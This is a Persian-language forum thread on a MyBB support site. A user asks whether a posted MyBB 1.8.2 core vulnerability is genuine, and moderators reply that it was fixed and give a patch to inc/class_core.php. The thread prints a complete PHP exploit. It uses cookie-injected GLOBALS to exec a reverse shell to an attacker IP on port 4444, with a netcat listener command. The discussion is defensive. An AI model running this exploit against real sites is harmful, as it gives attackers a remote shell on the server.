مهمان عزیز خوش آمدید. ورود ثبت نام



امتیاز موضوع:
  • 0 رای - 0 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5

[-]
کلمات کلیدی
آیا این مشکل امنیتی در mybb 1 8 درسته؟

[پاسخ داده‌شده] آیا این مشکل امنیتی در mybb 1.8 درسته؟
Heart 
سلام و درود
یک باگ ثبت شده واسه mybb 1.8 که دسترسی برای چک ندارم.از دوستان میخوام چک کنن ببینن این درسته.آیا باگش درسته یا فیک هستش
چون زده داخل کور اصلی هستش

<?php

// Exploit Title: MyBB <= 1.8.2 Reverse Shell Exploit
// Software Link: http://resources.mybb.com/downloads/mybb_1802.zip
// Version: <= 1.8.2
// Tested on: MyBB 1.8.2

$target="http://localhost/mybb1802/index.php";
$yourip="ipaddress";
$ch=curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "GLOBALS=1; shutdown_functions[0][function]=exec; shutdown_functions[0][arguments][]=php%20%2Dr%20%27%24sock%3Dfsockopen%28%22$yourip%22%2C%204444%29%3Bexec%28%22%2Fbin%2Fsh%20%2Di%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27;");
curl_setopt($ch, CURLOPT_URL, $target);
curl_exec($ch);
curl_close($ch);

// nc -l 4444
// php mybb-1802-core-exploit.php

?>

دوستان لطفا چک کنید.من دسترسی ندارم.
چرا ادیتور با گوشی میام کامل لود نمیشه؟


پاسخ
IrIsT میگه:
مدیران اینو چک کردین؟درسته؟یا فیک هستش؟
لطقا سریع این باگ رو چک کنید بی زحمت.


پاسخ
Tofighi میگه:
فک کنم این مورد قبلا گزارش شده بوده و رفع هم شده در نسخه‌ی بعدی Smile
اکثر این مشکلات توی خود بلاگ مای بی‌بی نوشته میشن و رفع شدن


دعای خیر برای اعضای گروه مای بی‌بی فارسی را فراموش نکنید!تصویر: http://www.cdn.my-bb.ir/images/smilies-v6/lightbulb.gif

HeartHeart خیلی التماس دعا دارم... دعام کنید لطفا HeartHeart

اگر از گروه مای بی‌بی فارسی راضی هستید، پس لطفا آنرا حمایت کنید: حمایت می‌کنم
پاسخ
IrIsT میگه:
(۲۱ آبان ۱۳۹۵، ۰۵:۲۳ ب.ظ)Tofighi نوشته:  فک کنم این مورد قبلا گزارش شده بوده و رفع هم شده در نسخه‌ی بعدی Smile
اکثر این مشکلات توی خود بلاگ مای بی‌بی نوشته میشن و رفع شدن

تست کردین؟
راه حلش چیه؟چون هرچی گشتم نبود.
راه پچ رو میگید.


پاسخ
Tofighi میگه:
توی inc/class_core.php، سرچ کنید 
کد:
die("Hacking attempt");
شرطی که این کد اجرا میشه رو پاک کنید و به جاش شرط زیر رو بزارید:
کد پی‌اچ‌پی:
if(isset($_POST[$var]) || isset($_GET[$var]) || isset($_COOKIE[$var]) || isset($_FILES[$var]))
{
die(
"Hacking attempt");

باسپاس


دعای خیر برای اعضای گروه مای بی‌بی فارسی را فراموش نکنید!تصویر: http://www.cdn.my-bb.ir/images/smilies-v6/lightbulb.gif

HeartHeart خیلی التماس دعا دارم... دعام کنید لطفا HeartHeart

اگر از گروه مای بی‌بی فارسی راضی هستید، پس لطفا آنرا حمایت کنید: حمایت می‌کنم
پاسخ


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  پاسخ داده شده استاتیک کردن نشانی (لینک) مطالب در MyBB Mahshid 1 90 ۱۸ آبان ۱۳۹۶، ۰۹:۲۸ ق.ظ
آخرین ارسال: sarmadi
Exclamation در انتظار پاسخ مشکل در حذف موضوع و یا پست badland 1 84 ۱۱ مهر ۱۳۹۶، ۰۱:۰۱ ب.ظ
آخرین ارسال: hamidkag
  پاسخ داده شده مشکل در ورود به انجمن .... ali5866 2 458 ۰۸ مهر ۱۳۹۶، ۰۱:۰۱ ب.ظ
آخرین ارسال: badland
  پاسخ داده شده مشکل عجیب و رندوم انجمن! Mahachita 3 188 ۱۴ شهریور ۱۳۹۶، ۰۱:۳۰ ق.ظ
آخرین ارسال: Tofighi
  پاسخ داده شده چرا سرچ mybb اینقدر ضعیفه؟! Mahachita 1 127 ۱۴ شهریور ۱۳۹۶، ۰۱:۲۰ ق.ظ
آخرین ارسال: Tofighi
  حل‌شده مشکل در نقل و قول ادیتور Dark_Master 4 183 ۲۴ تير ۱۳۹۶، ۱۰:۵۶ ب.ظ
آخرین ارسال: Dark_Master
  پاسخ داده شده مشکل در نمایش فایل آپلود شده dizan 1 138 ۰۹ تير ۱۳۹۶، ۰۲:۰۱ ب.ظ
آخرین ارسال: Tofighi
Sad پاسخ داده شده مشکل در ثبت نام کاربران alikassaee 3 290 ۰۶ فروردین ۱۳۹۶، ۱۱:۳۳ ق.ظ
آخرین ارسال: ERFAN-DESIGN
  حل‌شده مشکل در تغییر فونت aqilhex 8 331 ۰۲ فروردین ۱۳۹۶، ۰۲:۵۲ ب.ظ
آخرین ارسال: aqilhex
  حل‌شده مشکل در Global.css aqilhex 4 238 ۲۶ اسفند ۱۳۹۵، ۰۷:۳۴ ب.ظ
آخرین ارسال: aqilhex

پرش به انجمن:


کاربران در حال بازدید این موضوع:

1 مهمان


درباره‌ی ما

گروه پشتیبانی فارسی مای بی بی My-BB.Ir در واپسین روزهای پاییز 1391 کار خود را در زمینه مای بی بی آغاز کرد. این گروه با توکل بر خدای منان و دانش فنی خود در تلاش است فعالیتی هرچند ناچیز در زمینه ارتقا و پشتیبانی مای بی بی انجام دهد.
تمامی حقوق برای وب‌سایت پشتیبانی فارسی مای بی‌بی (My-BB.Ir) محفوظ می‌باشد و هرگونه کپی‌برداری از آن شرعا حرام و قانونا غیرمجاز می‌باشد.
قدرت گرفته از مای بی‌بی - فارسی‌ساز: My-BB.Ir و IORA.Ir